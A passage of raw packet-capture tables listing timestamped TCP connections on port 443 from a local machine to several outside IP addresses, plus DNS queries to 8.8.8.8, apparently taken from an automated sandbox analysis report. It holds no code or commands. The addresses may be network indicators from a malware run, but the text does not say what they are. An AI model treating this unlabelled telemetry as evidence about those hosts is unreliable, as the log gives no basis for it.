                                                                                                                                                          Feb 16, 2021 04:32:05.435920000 CET49777443192.168.2.346.30.215.215
                                                                                                                                                          Feb 16, 2021 04:32:05.435950041 CET4434977746.30.215.215192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.435961008 CET49777443192.168.2.346.30.215.215
                                                                                                                                                          Feb 16, 2021 04:32:05.436002970 CET4434977746.30.215.215192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.436054945 CET4434977746.30.215.215192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.436064005 CET49777443192.168.2.346.30.215.215
                                                                                                                                                          Feb 16, 2021 04:32:05.436121941 CET4434977746.30.215.215192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.436183929 CET4434977746.30.215.215192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.436232090 CET4434977746.30.215.215192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.436281919 CET4434977746.30.215.215192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.436310053 CET49777443192.168.2.346.30.215.215
                                                                                                                                                          Feb 16, 2021 04:32:05.436342001 CET4434977746.30.215.215192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.436383963 CET49777443192.168.2.346.30.215.215
                                                                                                                                                          Feb 16, 2021 04:32:05.436393023 CET4434977746.30.215.215192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.436419010 CET49777443192.168.2.346.30.215.215
                                                                                                                                                          Feb 16, 2021 04:32:05.436443090 CET49777443192.168.2.346.30.215.215
                                                                                                                                                          Feb 16, 2021 04:32:05.510123968 CET4434977746.30.215.215192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.510740995 CET49777443192.168.2.346.30.215.215
                                                                                                                                                          Feb 16, 2021 04:32:05.571540117 CET49778443192.168.2.3172.67.222.33
                                                                                                                                                          Feb 16, 2021 04:32:05.625291109 CET44349778172.67.222.33192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.625494957 CET49778443192.168.2.3172.67.222.33
                                                                                                                                                          Feb 16, 2021 04:32:05.626066923 CET49778443192.168.2.3172.67.222.33
                                                                                                                                                          Feb 16, 2021 04:32:05.677191973 CET44349778172.67.222.33192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.679208994 CET44349778172.67.222.33192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.679265976 CET44349778172.67.222.33192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.679308891 CET44349778172.67.222.33192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.679853916 CET49778443192.168.2.3172.67.222.33
                                                                                                                                                          Feb 16, 2021 04:32:05.690439939 CET49778443192.168.2.3172.67.222.33
                                                                                                                                                          Feb 16, 2021 04:32:05.741451979 CET44349778172.67.222.33192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.741509914 CET44349778172.67.222.33192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.747864962 CET49778443192.168.2.3172.67.222.33
                                                                                                                                                          Feb 16, 2021 04:32:05.747912884 CET49778443192.168.2.3172.67.222.33
                                                                                                                                                          Feb 16, 2021 04:32:05.798986912 CET44349778172.67.222.33192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.799036026 CET44349778172.67.222.33192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.875631094 CET44349778172.67.222.33192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.875683069 CET44349778172.67.222.33192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.875720024 CET44349778172.67.222.33192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.875999928 CET49778443192.168.2.3172.67.222.33
                                                                                                                                                          Feb 16, 2021 04:32:05.876183987 CET49778443192.168.2.3172.67.222.33
                                                                                                                                                          Feb 16, 2021 04:32:05.876316071 CET49778443192.168.2.3172.67.222.33
                                                                                                                                                          Feb 16, 2021 04:32:06.296616077 CET49779443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:06.571836948 CET44349779116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:06.572511911 CET49779443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:06.573302031 CET49779443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:06.847693920 CET44349779116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:06.848927975 CET44349779116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:06.848973036 CET44349779116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:06.849010944 CET44349779116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:06.849746943 CET49779443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:06.854137897 CET49779443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:07.128891945 CET44349779116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:07.132802010 CET49779443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:07.132988930 CET49779443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:07.408195972 CET44349779116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:07.408256054 CET44349779116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:07.408288002 CET44349779116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:07.408315897 CET44349779116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:07.409766912 CET49779443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:07.410135984 CET49779443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:07.410224915 CET49779443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:07.570971966 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:07.684636116 CET44349779116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:07.684683084 CET44349779116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:07.848795891 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:07.849034071 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:07.850111961 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:08.126059055 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:08.127357960 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:08.127417088 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:08.127537966 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:08.127559900 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:08.136682034 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:08.413228035 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:08.455539942 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:08.704530001 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.018476963 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276645899 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276709080 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276750088 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276787996 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276810884 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.276839018 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276875973 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.276885033 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276926041 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276962042 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276981115 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.277017117 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.444510937 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.444576979 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.444663048 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.553421021 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553498983 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553529978 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553563118 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553603888 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553622961 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.553644896 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553658962 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.553700924 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553741932 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553757906 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.553791046 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553836107 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553852081 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.553874969 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553884983 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.553977966 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.554042101 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.554106951 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.554265022 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.554307938 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.554322958 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.554419041 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.556569099 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.719660997 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.719722033 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.719770908 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.719805002 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.719815016 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.720746994 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.829663038 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.829727888 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.829766989 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.829823971 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.829869032 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.829973936 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830035925 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.830094099 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830136061 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830144882 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.830296040 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830351114 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.830368996 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830451012 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830509901 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.830586910 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830631018 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830694914 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.830775023 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830825090 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.831103086 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.832307100 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.832406998 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.832467079 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.832509995 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.832586050 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.832649946 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.832696915 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.832839966 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.832880974 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.832905054 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.832921982 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.832973003 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.833003044 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.833046913 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.833116055 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.833197117 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.833252907 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.833297014 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.833336115 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.833350897 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.833405018 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.836952925 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.837025881 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:10.114310026 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.114357948 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.310934067 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.368880987 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.369541883 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.371767998 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.432796001 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.456563950 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.456650019 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.456686020 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.456847906 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.460866928 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.522576094 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.526660919 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.526707888 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.584558964 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.585211039 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.585248947 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.585664034 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.585881948 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.585977077 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.643718004 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.691404104 CET49782443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.749304056 CET4434978285.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.749733925 CET49782443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.750271082 CET49782443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.807487965 CET4434978285.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.833573103 CET4434978285.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.833622932 CET4434978285.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.833653927 CET4434978285.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.833988905 CET49782443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.835566044 CET49782443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.894685030 CET4434978285.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.897077084 CET49782443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.956501961 CET4434978285.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.956556082 CET4434978285.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.956736088 CET49782443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.956959963 CET49782443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.957030058 CET49782443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:11.014065981 CET4434978285.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.014115095 CET4434978285.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.098067999 CET49783443192.168.2.391.121.58.131
                                                                                                                                                          Feb 16, 2021 04:32:11.152884960 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.153549910 CET49783443192.168.2.391.121.58.131
                                                                                                                                                          Feb 16, 2021 04:32:11.154484987 CET49783443192.168.2.391.121.58.131
                                                                                                                                                          Feb 16, 2021 04:32:11.209057093 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.213794947 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.213845015 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.213876963 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.214874983 CET49783443192.168.2.391.121.58.131
                                                                                                                                                          Feb 16, 2021 04:32:11.232279062 CET49783443192.168.2.391.121.58.131
                                                                                                                                                          Feb 16, 2021 04:32:11.285171032 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.291838884 CET49783443192.168.2.391.121.58.131
                                                                                                                                                          Feb 16, 2021 04:32:11.291924000 CET49783443192.168.2.391.121.58.131
                                                                                                                                                          Feb 16, 2021 04:32:11.346826077 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.379523039 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.379585028 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.379627943 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.379667997 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.379715919 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.379760027 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.379798889 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.379838943 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.379878044 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.379914999 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.384232998 CET49783443192.168.2.391.121.58.131
                                                                                                                                                          Feb 16, 2021 04:32:11.384507895 CET49783443192.168.2.391.121.58.131
                                                                                                                                                          Feb 16, 2021 04:32:11.384733915 CET49783443192.168.2.391.121.58.131
                                                                                                                                                          Feb 16, 2021 04:32:11.439569950 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.439630032 CET4434978391.121.58.131192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.439744949 CET49783443192.168.2.391.121.58.131
                                                                                                                                                          Feb 16, 2021 04:32:11.439867973 CET49783443192.168.2.391.121.58.131
                                                                                                                                                          Feb 16, 2021 04:32:11.478472948 CET49784443192.168.2.313.74.136.93
                                                                                                                                                          Feb 16, 2021 04:32:14.491194010 CET49784443192.168.2.313.74.136.93
                                                                                                                                                          Feb 16, 2021 04:32:20.493396997 CET49784443192.168.2.313.74.136.93

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Feb 16, 2021 04:29:22.521033049 CET6418553192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:29:22.572073936 CET53641858.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:29:23.406858921 CET6511053192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:29:23.458901882 CET53651108.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:29:24.719341040 CET5836153192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:29:24.768263102 CET53583618.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:29:25.586446047 CET6349253192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:29:25.646028996 CET53634928.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:29:26.570655107 CET6083153192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:29:26.628654957 CET53608318.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:29:27.790971994 CET6010053192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:29:27.840059042 CET53601008.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:29:28.807737112 CET5319553192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:29:28.858831882 CET53531958.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:29:30.035231113 CET5014153192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:29:30.085700035 CET53501418.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:29:31.180174112 CET5302353192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:29:31.229413033 CET53530238.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:29:32.589783907 CET4956353192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:29:32.644067049 CET53495638.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:29:33.803453922 CET5135253192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:29:33.855159998 CET53513528.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:29:34.640465021 CET5934953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:29:34.689838886 CET53593498.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:29:49.002902031 CET5708453192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:29:49.051624060 CET53570848.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:29:55.369581938 CET5882353192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:29:55.445276022 CET53588238.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:29:58.129129887 CET5756853192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:29:58.190361977 CET53575688.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:30:08.835669994 CET5054053192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:30:08.902369022 CET53505408.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:30:11.564017057 CET5436653192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:30:11.612683058 CET53543668.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:30:25.048815966 CET5303453192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:30:25.100713015 CET53530348.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:30:28.330926895 CET5776253192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:30:28.393459082 CET53577628.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:00.524142027 CET5543553192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:00.575427055 CET53554358.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:03.148891926 CET5071353192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:03.226804972 CET53507138.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:21.640697956 CET5613253192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:21.703397036 CET53561328.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:24.974905968 CET5898753192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:25.036159039 CET53589878.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:26.445280075 CET5657953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:26.512871981 CET53565798.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:28.557543993 CET6063353192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:28.780672073 CET53606338.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:30.053442955 CET6129253192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:30.143604994 CET53612928.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:30.836918116 CET6361953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:30.894342899 CET53636198.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:32.055636883 CET6493853192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:32.128249884 CET53649388.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:32.418595076 CET6194653192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:32.490235090 CET53619468.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:33.980079889 CET6491053192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:34.146749020 CET53649108.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:35.080341101 CET5212353192.168.2.38.8.8.8
